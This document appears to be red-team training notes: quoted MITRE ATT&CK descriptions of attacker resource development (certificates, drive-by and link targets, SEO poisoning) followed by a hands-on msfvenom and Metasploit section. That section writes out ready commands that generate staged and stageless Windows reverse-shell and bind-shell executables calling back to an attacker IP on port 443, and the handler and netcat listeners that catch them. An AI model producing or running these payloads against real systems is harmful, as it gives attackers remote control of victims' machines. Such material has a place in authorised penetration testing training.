    Install Digital Certificate [Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.]

Some TAs conclude in the first phase that an organization relies on a particular website for a business process; accordingly they break into that site, infect it, and use it to gain access to the organization.

Watering hole attack, supply chain attack

    Drive-by Target [Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in Drive-by Compromise. In such cases, the user’s web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as Application Access Token. Prior to Drive-by Compromise, adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired (Acquire Infrastructure) or previously compromised (Compromise Infrastructure).]

    Link Target [Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in Malicious Link. Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in Spearphishing Link) or a phish to gain initial access to a system (as in Spearphishing Link), an adversary must set up the resources for a link target for the spearphishing link.]

One method TAs use is to build a malicious site and, through SEO, push the fake site above the real one in search results; North Korean TAs in particular do this to steal crypto.

    SEO Poisoning [Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.]

In summary, we have to prepare the following for every operation:

  1. VPS
  2. Domain
  3. Credentials
  4. Info
  5. Exploit
  6. Payloads

The simplest malware you can use in your red team operation is a Metasploit payload, which you can generate with the msfvenom tool.

Payloads come in two forms, staged or stageless: either they only download the malware in order to connect to your handler or team server, or they themselves contain the code that opens the socket back to you, which is what is called stageless.

msfvenom

Two major types of Payloads

Stager: commonly identified by a second slash (/) in the name, such as windows/meterpreter/reverse_tcp

Just a downloader

Stageless: uses _ instead of the second / in the payload name, such as windows/meterpreter_reverse_tcp

Full payload

Fileless payloads run in memory: hta, powershell

In general, to build a payload, follow the structure below:

msfvenom -p <staged or stageless payload> LHOST=<attacker IP> LPORT=<listener port> -f exe > <output file>

LHOST = IP of the Kali machine

LPORT = any port you wish to assign to the listener

-p = payload (i.e. Windows, Android, PHP etc.)

-f = output format (i.e. windows=exe, android=apk etc.)

Bind shell [A bind shell is a kind that opens up a new service on the target machine and requires the attacker to connect to it in order to get a session]

msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe

Connect to the target (one msfconsole command per line):

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/bind_tcp
msf exploit(handler) > set rhost 192.168.0.100
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit

Staged and stageless versions of the same payload (note the second / versus the _):

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.219.128 lport=443 -f exe > staged.exe

msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.219.128 lport=443 -f exe > stageless.exe

Payload type: stageless (windows/shell_reverse_tcp uses the _ form, so the whole shell is inside the executable and a plain netcat listener can receive it)

msfvenom -p windows/shell_reverse_tcp lhost=192.168.219.128 lport=443 -f exe > shell.exe

nc -lvp 443

Payload type: staged (windows/x64/meterpreter/reverse_https uses the second / form, so the executable only fetches the stage from the listener; netcat cannot serve that stage, so the listener has to be exploit/multi/handler with the same payload, as shown above)

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.219.128 lport=443 -f exe > shell.exe

nc -lvp 443 (only catches the plain shell payload above; for the staged meterpreter use the handler)